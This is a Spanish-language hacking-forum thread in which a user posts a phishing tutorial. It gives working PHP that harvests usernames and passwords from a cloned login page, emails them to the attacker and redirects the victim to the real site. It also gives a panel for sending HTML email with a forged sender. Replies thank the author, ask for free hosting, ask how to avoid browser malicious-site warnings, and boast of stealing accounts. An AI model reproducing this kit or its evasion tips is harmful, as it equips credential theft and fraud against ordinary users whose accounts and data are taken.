Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Hacking => Mensaje iniciado por: rollth en Noviembre 12, 2014, 08:18:37 am

Título: Tutorial phishing
Publicado por: rollth en Noviembre 12, 2014, 08:18:37 am
Buenos dias/tardes/noches.

Os traigo un pequeño tutorial de como hacer phishing, aclaro que he seleccionado una pagina aleatoria.

Lo primero es irnos a la contraseña y darle a inspeccionar elemento.

(http://i.gyazo.com/7dca065446a4d5d36fe18f7f8401af7a.png)

Buscamos el form y le añadimos un action="scam.php"

(http://i.gyazo.com/aba5e3fd9bd0d3f52e9432d8742d384b.png)

Copiamos el codigo html en un archivo html y con codificacion UFT-8

En la misma carpeta donde tenemos el archivo html creamos un php con el siguiente codigo (en UFT-8 tambien):

Código: PHP
  1. <?php
  2.  
  3. $user = trim($_POST['el name del input del user']);
  4. $password = trim($_POST['el name del input de pass']);
  5.  
  6. $correoreceptor = "aquí cámbialo y pon tu correo";
  7. $asunto = "Ha caido una nueva víctima";
  8. $mensaje = "Usuario: ".$user."  -  Contraseña: ".$password;
  9.  
  10. mail($correoreceptor, $asunto, $mensaje);
  11. header('Location: Pagina real');
  12.  
  13. ?>

Ya solo hace falta buscar un host gratis y subirlo todo

Asi quedaria la pagina falsa

(http://i.gyazo.com/0135b6e72db51139792dbc4768644ec1.png)

Y nos mandaria todos los logs a nuestro correo electronico :)

EDITO

He tenido varios problemas de los cuales solo aviso y no voy a explicar como librarse.

1º css en archivo en lugar de en html, tendreis que descargarlo para que la pagina quede exactamente igual.

2º script para impedir escribir en <input name="password"> en caso de estar en otra web, tendreis que borrar el script.

EDITO

Voy a explicar como hacer un panel para que mande un correo a donde tu quieras (Se suele usar mucho en el phishing)

lo primero es el codigo html al que llamaremos index.html

Código: HTML5
  1. </head>
  2. <div>
  3. <h1>Phishing Pagina</h1>
  4. <p>Correo al que desea enviar el email:</p>
  5. <form action="correof.php" method="post">
  6. <input name="correof" type="text">
  7. <button type="submit">Enviar</button>
  8. </form>
  9. </div>
  10. </body>
  11. </html>

Creamos un .php con este codigo (se llamara correof):

Código: PHP
  1. <?php
  2.  
  3. $correoreceptor = trim($_POST['correof']);
  4. $asunto = "Asunto del correo";
  5. $mensaje = 'Codigo html del cuerpo';
  6. $cabeceras  = 'MIME-Version: 1.0' . "\r\n";
  7. $cabeceras .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  8. $cabeceras .= 'From: Nombre del que se envia <Correo del que se envia>' . "\r\n";
  9.  
  10. mail($correoreceptor, $asunto, $mensaje, $cabeceras);
  11.  
  12.  
  13.  
  14. ?>

También me pueden seguir en Twitter si les hace ilusión: @RoloMijan (https://twitter.com/RoloMijan)

Saludos
Título: Re:Tutorial phishing
Publicado por: Y3K en Noviembre 12, 2014, 10:23:58 pm
Gracias por el tutorial.

Sencillo pero más de uno caerá en algo así.
Título: Re:Tutorial phishing
Publicado por: Aryenal.Bt en Noviembre 16, 2014, 04:09:51 am
buen post, algo por donde comenzar.
Título: Re:Tutorial phishing
Publicado por: NyxKazuya en Noviembre 17, 2014, 12:32:21 pm
Toda una pasada el code si que esta bueno :D gracias
Título: Re:Tutorial phishing
Publicado por: baron.power en Noviembre 19, 2014, 07:11:21 pm
genial bro, sencillo, rapido y eficaz, estupendo trabajo, gracias por compartirlo, saludos
Título: Re:Tutorial phishing
Publicado por: rollth en Enero 01, 2015, 03:43:56 pm
Modificado explicando como hacer un panel.
Título: Re:Tutorial phishing
Publicado por: GangsteR en Enero 13, 2015, 09:07:55 pm
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
Título: Re:Tutorial phishing
Publicado por: rollth en Enero 13, 2015, 10:15:32 pm
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)

Intente explicar de forma que cualquier persona que no sepa entendiera, si tienes algun problema contactame.
Título: Re:Tutorial phishing
Publicado por: xrahiel en Enero 21, 2015, 08:46:00 pm
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
;)
Título: Re:Tutorial phishing
Publicado por: rollth en Enero 21, 2015, 10:07:25 pm
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
;)

No creo que a la gente les sea muy util si no compartes el run.bat

Otra cosa es que en lugar de direccionar a forbiden 403 podrias redireccionar a la pagina real para que crea que ha sido un error y entonces entre normalmente.
Título: Re:Tutorial phishing
Publicado por: Payasako en Enero 29, 2015, 07:19:55 pm
Mira por donde va a haber un segundo Facebook jajaja excelente tutorial. ]

Enviado desde mi LG-E400 usando Tapatalk 2

Título: Re:Tutorial phishing
Publicado por: kR4N30 en Marzo 30, 2015, 08:51:19 pm
Gracias bro, simple pero más de uno cae, saludos.
Título: Re:Tutorial phishing
Publicado por: EPSILON en Marzo 31, 2015, 02:39:00 am
Buena info.! esa es la idea básica de un Scam, el resto es pura imaginación...
Título: Re:Tutorial phishing
Publicado por: Banfek en Abril 01, 2015, 02:29:31 pm
Muy buen aporte!
¿Alguien podría decirme algún host gratuito recomendable?

Saludos.
Título: Re:Tutorial phishing
Publicado por: Payasako en Abril 02, 2015, 09:48:54 am
Yo el año pasado me pasaba el dia haciendo esto jajaja. Estos fakes son muy útiles para robarte unas cuentas.
Título: Re:Tutorial phishing
Publicado por: Xlitec0d3 en Noviembre 25, 2015, 06:15:08 pm
Yo tengo hecho un panel para enviar emails: Infzonne.esy.es (http://Infzonne.esy.es)
Tiene contraseña, que es... : Underc0deano

Si lo se... original.
Provadlo y me decis.
: D
Título: Re:Tutorial phishing
Publicado por: rollth en Noviembre 25, 2015, 08:33:11 pm
Bueno, mas que un panel de control para phishing es un fake email :D
Título: Re:Tutorial phishing
Publicado por: eliasacero en Junio 17, 2016, 03:32:24 pm
hola amigos soy nuevo en este grupo pero empiezo así  tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto
Título: Re:Tutorial phishing
Publicado por: Gabriela en Junio 17, 2016, 03:56:30 pm
hola amigos soy nuevo en este grupo pero empiezo así  tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto

Por favor,edita tu post y redacta un texto que se entienda, qué es lo que tienes y qué quieres. El foro tiene corrector ortográfico también.
Es casi ilegible/incomprensible lo que has escrito.

 Leer (https://underc0de.org/foro/dudas-generales-121/(actualizado)-como-realizar-dudas-bien-redactadas-28836/)
Gracias

Gabriela
Título: Re:Tutorial phishing
Publicado por: NuMB3RW4N en Agosto 21, 2016, 06:12:54 am
hola buenas estos phishing   

¿son detectados  por google chrome como pagina maliciosa?

no tendría ningún sentido hacer lo pasos  lograr montarlo en un servidor gratuito
para que al final cuando se lo envíes ala victima salga pagina maliciosa
ya que ninguna persona caería en la trampa 
Título: Re:Tutorial phishing
Publicado por: rollth en Agosto 21, 2016, 06:45:38 am
hola buenas estos phishing   

¿son detectados  por google chrome como pagina maliciosa?

no tendría ningún sentido hacer lo pasos  lograr montarlo en un servidor gratuito
para que al final cuando se lo envíes ala victima salga pagina maliciosa
ya que ninguna persona caería en la trampa

Si lo haces de una página estilo Twitter o Facebook, lo más seguro es que lo detecte, pero igual seguro haciendo algunas modificaciones se puede hacer que no lo detecte.
Título: Re:Tutorial phishing
Publicado por: garzon092 en Diciembre 11, 2017, 06:00:04 pm
excelente! me ha servido casi todo solo que al loggear no me llega ningun correo con la info... ayuda  :(
Título: Re:Tutorial phishing
Publicado por: rush en Diciembre 11, 2017, 07:25:18 pm
excelente! me ha servido casi todo solo que al loggear no me llega ningun correo con la info... ayuda  :(

Si es host gratis, verifica que tengas opción para poder enviar correos y si puedes enviar correos entones sera cuestión de configuración.

Saludos!!